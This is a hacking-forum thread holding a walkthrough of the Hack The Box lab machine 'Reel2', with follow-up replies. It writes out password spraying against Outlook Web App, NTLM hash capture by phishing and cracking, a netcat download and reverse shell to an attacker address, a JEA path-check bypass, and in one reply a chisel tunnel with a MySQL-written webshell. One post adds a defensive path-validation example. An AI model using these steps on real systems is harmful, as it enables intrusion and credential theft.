TUTORIAL Reel2 Detailed Writeup
by y0ukn0wm3 - October 09, 2020 at 04:18 PM
#1
-> Run nmap
-> http(80), https(443), http-proxy(8080) are open
-> Enumerating http reveals nothing
-> Enumerating https:
gobuster dir -u https://reel2.htb -w /usr/share/Seclists/Discovery/DNS/dns-Jhaddix.txt -b 404,403 -k

/owa
-> Outlook WebApp is available on port 443 which requires creds
-> On port 8080, create a user account and log in; going through the posts, user sven has a post saying summer is hot
-> Gather all the user names in a txt file, gather all passwords related to summer in a txt file and call it pass

Generate user names from this script: https://pastebin.com/QXrDwkW2
Obtained passwords: grep -R Summer /usr/share/Seclists | tee pass.txt

-> With the valid user names and passwords in hand, let's brute-force the OWA login

Bruteforce tool: https://github.com/byt3bl33d3r/SprayingToolkit

-> Bruteforce owa
atomizer owa user.txt pass.txt -t 5 -i 0:0:5 10.10.10.210

-> Valid login creds obtained
s.svensson : Summer2020
-> login to OWA in https://10.10.10.210/OWA
-> site is in another language, open in chromium -> Always translate
-> Going around, while composing a new message, all the users are obtained: select all and click the [To] button
-> All the users are added to the To section
-> Start Reeling (Phishing)
-> With the responder on,
responder -I tun0
-> Give the subject as you wish, body as your HTB IP (10.10.*.*)
-> An NTLM hash will be obtained in responder, why does it work ??

here is the answer: https://www.ired.team/offensive-security...ng-outlook

-> Cracking the obtained NTLM hash
hashcat -m5600
k.svensson::htb:3c65c6a9f48fd29d... (rest of the captured hash truncated)

-> password is obtained, k.svensson: kittycat1
-> Logging in with WinRM fails even though port 5985 is open
-> using Powershell to login
-> Install powershell for Debian
sudo apt-get install powershell

after installation, pwsh gives access to PowerShell

pwsh

-> in the pwsh powershell
-> Login to the machine with the PSSession

Enter-PSSession -Computer 10.10.10.210 -credential HTB\k.svensson -Authentication Negotiate

-> Provide the password to obtain shell
-> Now commands like dir, ls, cd, whoami won't work. $env:username and $env:domainname work
-> Execute powershell commands with the script block

https://stackoverflow.com/questions/1808...r-a-script

[10.10.10.210]: P> &{ cd ../Desktop }
[10.10.10.210]: PS>& { ls }         


    Directory: C:\Users\k.svensson\Desktop


Mode                LastWriteTime        Length Name                             
----                -------------        ------ ----                             
-a----        7/30/2020  1:19 PM          2428 Sticky Notes.lnk                 
-ar---        10/9/2020  7:21 AM            34 user.txt                         


[10.10.10.210]: P> &{ type user.txt}

-> Now transfer nc and obtain a reverse shell

[10.10.10.210]: P> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: P> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: P> &{ ./nc.exe 10.10.xx.xx 1234 -e powershell.exe}

-> Before entering the last command, listen on port 1234
-> now the reverse shell is obtained
-> Enumerating basic stuff.. nothing found; enumerating log files

dir /s /b *.log

-> looking at the 000003.log the password for the jea_test_account is enumerated

jea_test_account : [email protected]^%@#1

-> Looking at the basic jea_test_account.psrc and .pssc, the Check-File command loads the file if the path is from "C:\ProgramData"
-> Create a Symlink

PowerShell:
md adminDir (in the ProgramData Dir)
New-Junction -Link 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

(or)
CMD:
mklink /J root c:\Users\Administrator\Desktop

-> Now this is accessible only by the jea_test_account
-> Entering the PowerShell session as jea_test_account directly will not work
-> For jea_test_account, the credentials have to be passed as a cmdlet object

$username = "jea_test_account"
$password = ConvertTo-SecureString "[email protected]^%@#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)

Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate

-> Now you cannot execute code like you did for the k.svensson account
-> The command gcm (Get-Command) lists the available commands; the previously observed Check-File command is enumerated
-> Time to obtain root.txt: as we symlinked the Administrator directory, let's get the root.txt

Check-File C:\programdata\root\Desktop\root.txt


Thanks:
Completed this awesome machine with the help of my friend cyberwr3nch and with the help of the RF community
Sylz and some ppl

My friend:
make sure to check out my friends github:
https://github.com/cyberwr3nch/hackthebox

Donate:
Like this writeup Donate us:
Donate me with credits here:


Donate to my friend who is looking for an opportunity to complete OSCP or to obtain Pro Labs:
https://www.buymeacoffee.com/cyberwr3nch
#2
Nice sharing , 8 credits is for you : )
#3
(October 09, 2020 at 04:46 PM)BL4CK-3Y3 Wrote: Nice sharing , 8 credits is for you : )

Thanks, consider donating to my friend too if you wish
#4
I checked Check-File C:\programdata\root\Desktop\root.txt
I tried using a symlink but it was not helpful
how to read root.txt?
#5
nice sharing man, I will make your writeup look better...
#6
(October 10, 2020 at 10:33 AM)cypherdz23 Wrote: I checked Check-File C:\programdata\root\Desktop\root.txt
I tried using a symlink but it was not helpful
how to read root.txt?

Create a junction link with the mklink /J command and log in as jea_test_account to read the root.txt
Check-File C:\programdata\root\Desktop\root.txt

(October 10, 2020 at 11:19 AM)lucifer113 Wrote: nice sharing man, I will make your writeup look better...

Yeah you just add the pictures
#7
it's not working. fyi ALL

New-Junction -Link 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

you can use this one

New-Item -ItemType Junction -Path 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

gl next
#8
I don't see the content in the 00003.log file
The type command gives some gibberish
And this command is not working
dir /s /b *.log
#9
The link to the directory isn't necessary: the validation is basic, and using the path c:\programdata\..\users\administrator\desktop\root.txt works with the Check-File command that the JEA user is allowed to run.
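Both bypasses in this thread (the junction under ProgramData in post #1 and the `..` traversal above) work because the JEA function only string-checks the prefix of the requested path. As an added example that is not code from the box or from the original posts, here is how a role-capability function could validate the path instead; the function name Test-AllowedFile and the parameter $AllowedRoot are assumed, and it assumes Windows paths.

```powershell
# Added example, not the box's Check-File: a hardened path check for a JEA
# role capability. The original only checked that the string starts with
# C:\ProgramData, so "..\" segments and junctions both escape the root.
# Test-AllowedFile / $AllowedRoot are names chosen for this example.

function Test-AllowedFile {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $AllowedRoot = 'C:\ProgramData'
    )

    # 1. Canonicalise first: GetFullPath collapses "." and ".." segments,
    #    so c:\programdata\..\users\... becomes c:\users\... before comparison.
    $full = [System.IO.Path]::GetFullPath($Path)
    $root = [System.IO.Path]::GetFullPath($AllowedRoot).TrimEnd('\') + '\'

    if (-not $full.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
        throw "Denied: '$full' is outside '$root'"
    }

    # 2. Walk every component below the root and refuse any reparse point
    #    (junction or symlink). This is what stops mklink /J adminDir ->
    #    C:\Users\Administrator from redirecting an in-root path elsewhere.
    $cursor = $full
    while ($cursor.Length -gt $root.Length) {
        $item = Get-Item -LiteralPath $cursor -Force -ErrorAction Stop
        if (($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) -ne 0) {
            throw "Denied: '$cursor' is a reparse point"
        }
        $cursor = [System.IO.Path]::GetDirectoryName($cursor)
    }

    return $full   # safe to hand to Get-Content inside the constrained session
}

# The weak check, for comparison: both paths discussed in the thread pass it.
function Test-AllowedFileWeak {
    param([string] $Path)
    if ($Path -like 'C:\ProgramData\*') { return $Path }
    throw "Denied"
}
```

In a .psrc you would expose only Test-AllowedFile through VisibleFunctions; the junction check still assumes the file is read immediately after validation, since a link created between the check and the read would not be caught.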
#10
(October 10, 2020 at 05:12 PM)jane506 Wrote: The link to the directory isn’t necessary, the validation is basic and using the path c:\programdata\..\users\administrator\desktop\root.txt works with the check-file command that the JEA user is allowed to run.


that's new for me to hear... like I mentioned, it's not only my work; me and my friend discussed and worked on it, we looked for things whether it avails in the symlink type

(October 10, 2020 at 03:59 PM)Jockerjock Wrote: I don't see the content in the 00003.log file
The type command gives some gibberish
And this command is not working
dir /s /b *.log

dir /s /b *.log is a cmd command... be sure to switch from ps to cmd
#11
For a real root shell. ;)

PS C:\> whoami
nt authority\system
PS C:\> hostname
Reel2

1. as k.svensson cmd /c mklink /J xampp c:\xampp\
2. as jea_test_account check-file c:\programdata\xampp\htdocs\social\config\*.php
$servername = "localhost";
$username = "root";
$password = "Gregswd123FAEytjty";
$dbname = "wallstant";

3. on kali host chisel server -p 9005 --reverse
4. as k.svensson, copy \\10.10.xx.x\share\shell.php c:\programdata\
5. cmd /c \\10.10.xx.x\share\chisel.exe client 10.10.xx.x:9005 R:3306:127.0.0.1:3306
6. mysql -h 127.0.0.1 -u root -p Wallstant --password=Gregswd123FAEytjty

create table roothell (line blob);
INSERT INTO roothell values(load_file('/programdata/shell.php'));
SELECT * FROM Wallstant.roothell INTO DUMPFILE '/xampp/htdocs/social/shell.php';

7. Open your shell in the browser http://10.10.10.210:8080/shell.php and System!
#12
I used this command in cmd, not in ps
dir /s /b *.
But the result is none, anyone help pls
